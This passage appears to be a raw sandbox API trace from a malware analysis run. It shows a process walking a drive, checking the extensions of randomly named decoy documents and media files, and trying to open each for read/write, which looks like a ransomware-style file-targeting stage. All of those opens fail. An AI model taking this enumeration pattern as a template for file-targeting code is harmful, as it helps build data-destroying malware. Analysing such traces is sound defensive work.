lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.509] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8136, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSKEoPSkeN.jpg", cAlternateFileName="")) returned 1 [0181.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.509] PathFindExtensionW (pszPath="Z:\\SSKEoPSkeN.jpg") returned=".jpg" [0181.513] CreateFileW (lpFileName="Z:\\SSKEoPSkeN.jpg" (normalized: "z:\\sskeopsken.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.514] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10e96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qWCrNc.m4a", cAlternateFileName="")) returned 1 [0181.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.514] PathFindExtensionW (pszPath="Z:\\qWCrNc.m4a") returned=".m4a" [0181.518] CreateFileW (lpFileName="Z:\\qWCrNc.m4a" (normalized: "z:\\qwcrnc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.520] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cgtqEFU0PAhrauJ.ods", cAlternateFileName="")) returned 1 [0181.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.520] PathFindExtensionW (pszPath="Z:\\cgtqEFU0PAhrauJ.ods") returned=".ods" [0181.524] CreateFileW (lpFileName="Z:\\cgtqEFU0PAhrauJ.ods" (normalized: "z:\\cgtqefu0pahrauj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.526] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6539, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z1vXQLb4e3vCWmHziUz.mkv", cAlternateFileName="")) returned 1 [0181.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.526] PathFindExtensionW (pszPath="Z:\\Z1vXQLb4e3vCWmHziUz.mkv") returned=".mkv" [0181.530] CreateFileW (lpFileName="Z:\\Z1vXQLb4e3vCWmHziUz.mkv" (normalized: "z:\\z1vxqlb4e3vcwmhziuz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.531] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x80d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U3BnARny7QLta.mp4", cAlternateFileName="")) returned 1 [0181.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.532] PathFindExtensionW (pszPath="Z:\\U3BnARny7QLta.mp4") returned=".mp4" [0181.538] CreateFileW (lpFileName="Z:\\U3BnARny7QLta.mp4" (normalized: "z:\\u3bnarny7qlta.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.539] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16804, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7jSTZlo2FBO75BUO.wav", cAlternateFileName="")) returned 1 [0181.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.539] PathFindExtensionW (pszPath="Z:\\7jSTZlo2FBO75BUO.wav") returned=".wav" [0181.543] CreateFileW (lpFileName="Z:\\7jSTZlo2FBO75BUO.wav" (normalized: "z:\\7jstzlo2fbo75buo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.545] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x176d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OxtG5eiXbm.xls", cAlternateFileName="")) returned 1 [0181.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.545] PathFindExtensionW (pszPath="Z:\\OxtG5eiXbm.xls") returned=".xls" [0181.548] CreateFileW (lpFileName="Z:\\OxtG5eiXbm.xls" (normalized: "z:\\oxtg5eixbm.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.549] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa2dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sAXOlTuEN.odt", cAlternateFileName="")) returned 1 [0181.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.549] PathFindExtensionW (pszPath="Z:\\sAXOlTuEN.odt") returned=".odt" [0181.553] CreateFileW (lpFileName="Z:\\sAXOlTuEN.odt" (normalized: "z:\\saxoltuen.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.554] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x185b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S1VrbK55Uey.bmp", cAlternateFileName="")) returned 1 [0181.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.554] PathFindExtensionW (pszPath="Z:\\S1VrbK55Uey.bmp") returned=".bmp" [0181.558] CreateFileW (lpFileName="Z:\\S1VrbK55Uey.bmp" (normalized: "z:\\s1vrbk55uey.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.567] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWHuuMWix2.flv", cAlternateFileName="")) returned 1 [0181.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.567] PathFindExtensionW (pszPath="Z:\\DWHuuMWix2.flv") returned=".flv" [0181.572] CreateFileW (lpFileName="Z:\\DWHuuMWix2.flv" (normalized: "z:\\dwhuumwix2.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.575] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12c0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUsEMWHFeMlUg8RpMG.ots", cAlternateFileName="")) returned 1 [0181.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.575] PathFindExtensionW (pszPath="Z:\\fUsEMWHFeMlUg8RpMG.ots") returned=".ots" [0181.579] CreateFileW (lpFileName="Z:\\fUsEMWHFeMlUg8RpMG.ots" (normalized: "z:\\fusemwhfemlug8rpmg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.581] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10386, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F4BCJQiL.ots", cAlternateFileName="")) returned 1 [0181.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.581] PathFindExtensionW (pszPath="Z:\\F4BCJQiL.ots") returned=".ots" [0181.585] CreateFileW (lpFileName="Z:\\F4BCJQiL.ots" (normalized: "z:\\f4bcjqil.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.586] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x796b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YizWtOq9sqniAiG.pptx", cAlternateFileName="")) returned 1 [0181.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.587] PathFindExtensionW (pszPath="Z:\\YizWtOq9sqniAiG.pptx") returned=".pptx" [0181.591] CreateFileW (lpFileName="Z:\\YizWtOq9sqniAiG.pptx" (normalized: "z:\\yizwtoq9sqniaig.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.592] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe324, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfTEIxbdxeH16.wav", cAlternateFileName="")) returned 1 [0181.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.592] PathFindExtensionW (pszPath="Z:\\SfTEIxbdxeH16.wav") returned=".wav" [0181.596] CreateFileW (lpFileName="Z:\\SfTEIxbdxeH16.wav" (normalized: "z:\\sfteixbdxeh16.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.597] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICn9FymqAtw6QQL.ppt", cAlternateFileName="")) returned 1 [0181.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.597] PathFindExtensionW (pszPath="Z:\\ICn9FymqAtw6QQL.ppt") returned=".ppt" [0181.601] CreateFileW (lpFileName="Z:\\ICn9FymqAtw6QQL.ppt" (normalized: "z:\\icn9fymqatw6qql.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.602] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7c37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ewbUbaNVSvHfRRfQfQLC.xls", cAlternateFileName="")) returned 1 [0181.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.602] PathFindExtensionW (pszPath="Z:\\ewbUbaNVSvHfRRfQfQLC.xls") returned=".xls" [0181.606] CreateFileW (lpFileName="Z:\\ewbUbaNVSvHfRRfQfQLC.xls" (normalized: "z:\\ewbubanvsvhfrrfqfqlc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.607] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6b5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="svuJsC.pdf", cAlternateFileName="")) returned 1 [0181.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.607] PathFindExtensionW (pszPath="Z:\\svuJsC.pdf") returned=".pdf" [0181.611] CreateFileW (lpFileName="Z:\\svuJsC.pdf" (normalized: "z:\\svujsc.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.612] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x124eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gh4zJ.pps", cAlternateFileName="")) returned 1 [0181.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.612] PathFindExtensionW (pszPath="Z:\\gh4zJ.pps") returned=".pps" [0181.616] CreateFileW (lpFileName="Z:\\gh4zJ.pps" (normalized: "z:\\gh4zj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.617] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa869, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qys9GnLkOeS.odt", cAlternateFileName="")) returned 1 [0181.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.617] PathFindExtensionW (pszPath="Z:\\qys9GnLkOeS.odt") returned=".odt" [0181.621] CreateFileW (lpFileName="Z:\\qys9GnLkOeS.odt" (normalized: "z:\\qys9gnlkoes.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.622] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x592c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v4eytQpoJk.swf", cAlternateFileName="")) returned 1 [0181.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.622] PathFindExtensionW (pszPath="Z:\\v4eytQpoJk.swf") returned=".swf" [0181.628] CreateFileW (lpFileName="Z:\\v4eytQpoJk.swf" (normalized: "z:\\v4eytqpojk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.630] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8f30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="evMqhpDEt7CXv.mp3", cAlternateFileName="")) returned 1 [0181.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.630] PathFindExtensionW (pszPath="Z:\\evMqhpDEt7CXv.mp3") returned=".mp3" [0181.634] CreateFileW (lpFileName="Z:\\evMqhpDEt7CXv.mp3" (normalized: "z:\\evmqhpdet7cxv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.636] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pbnq0tEevfYiPYev3.flv", cAlternateFileName="")) returned 1 [0181.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.636] PathFindExtensionW (pszPath="Z:\\Pbnq0tEevfYiPYev3.flv") returned=".flv" [0181.640] CreateFileW (lpFileName="Z:\\Pbnq0tEevfYiPYev3.flv" (normalized: "z:\\pbnq0teevfyipyev3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.641] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, 